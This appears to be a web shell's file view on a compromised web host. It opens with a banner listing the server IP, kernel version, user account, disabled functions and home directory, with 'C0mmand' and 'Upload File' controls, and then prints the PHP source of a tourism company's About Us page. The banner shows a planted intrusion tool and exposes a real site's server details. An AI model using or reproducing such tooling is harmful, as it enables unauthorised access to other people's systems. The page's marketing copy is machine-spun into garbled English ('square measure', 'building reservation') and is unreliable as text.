Server IP : 103.53.40.154 / Your IP : 3.22.70.169 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/relianttourism.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>About Us | Reliant Tourism</title> <?php include "links.php";?> </head> <body> <?php include "header.php";?> <!-- breadcum area --> <div class="breadcrumb breadcrumb-style-one"> <div class="container"> <div class="col-lg-12 text-center"> <h1 class="breadcrumb-title">About <span class="lst-words">Us</span></h1> <ul class="d-flex justify-content-center breadcrumb-items"> <li class="breadcrumb-item"><a href="index.html">Home</a></li> <li class="breadcrumb-item active">About Us</li> </ul> </div> </div> </div> <div class="about-main-wrappper pt-50"> <div class="container"> <div class="about-tab-wrapper"> <div class="row justify-content-center align-items-center"> <div class="col-lg-5"> <div class="about-tab-image-grid text-center" style="padding-bottom: 140px;"> <div class="about-video d-inline-block" style="border: 3px solid #f99d0d;"> <img width="100%" src="<?php echo $wspath?>assets/images/sai-about.jpg" alt="<?php echo $site_name?>" title="<?php echo $site_name?>"> </div> </div> </div> <div class="col-lg-7 mt-5 mt-lg-0"> <div class="about-tab-wrap"> <h2 class="about-wrap-title"> Welcome To <span><?php echo $site_name?></span> </h2> <div class="tab-content about-tab-content" id="pills-tabContent"> <div class="tab-pane fade show active" id="about-pills1" role="tabpanel" aria-labelledby="pills-about1"> <p>There square measure organized conducted tours in most traveler centers between in style traveler destinations; cars/coaches square measure obtainable creating travel on short routes straightforward also as enticing, building reservation per your alternative, and in fact in accordance to your budget we will book your building accommodation by providing you with the good thing about the special rates that we have a tendency to fancy with most of the most important building chains. India Tourism Incredible additionally offers customizes tour services. We have a tendency to assist you to travel in vogue. We have a tendency to takes care of the client’s Simplest needs like drinking water, cold drinks, drinking water, newspapers, magazines and skilled clothed chauffeurs with pagers and First-Aid-Kit. Delhi Sightseeing Tour Our disciplined chauffeurs square measure associate plus on any journey. Our objective is to require care of your travel and time so you'll be able to watch out of your business and vacation.</p> </div> <div class="about-tab-switcher"> <ul class="nav nav-pills mb-3 justify-content-md-between justify-content-center" id="about-tab-pills" role="tablist"> <li class="nav-item" role="presentation"> <div class="nav-link active" id="pills-about1" data-bs-toggle="pill" data-bs-target="#about-pills1" role="tab" aria-controls="about-pills1" aria-selected="true"> <h3>15+</h3> <h6>Years Experience</h6> </div> </li> <li class="nav-item" role="presentation"> <div class="nav-link" id="pills-about2" data-bs-toggle="pill" data-bs-target="#about-pills2" role="tab" aria-controls="about-pills2" aria-selected="false"> <h3>5000+</h3> <h6>Trip Completed</h6> </div> </li> <li class="nav-item" role="presentation"> <div class="nav-link" id="pills-about3" data-bs-toggle="pill" data-bs-target="#about-pills3" role="tab" aria-controls="about-pills3" aria-selected="false"> <h3>1500+</h3> <h6>Clients</h6> </div> </li> </ul> </div> </div> </div> </div> </div> </div> </div> </div> <?php include "inner-footer.php";?> <?php include "footer.php" ?> </html>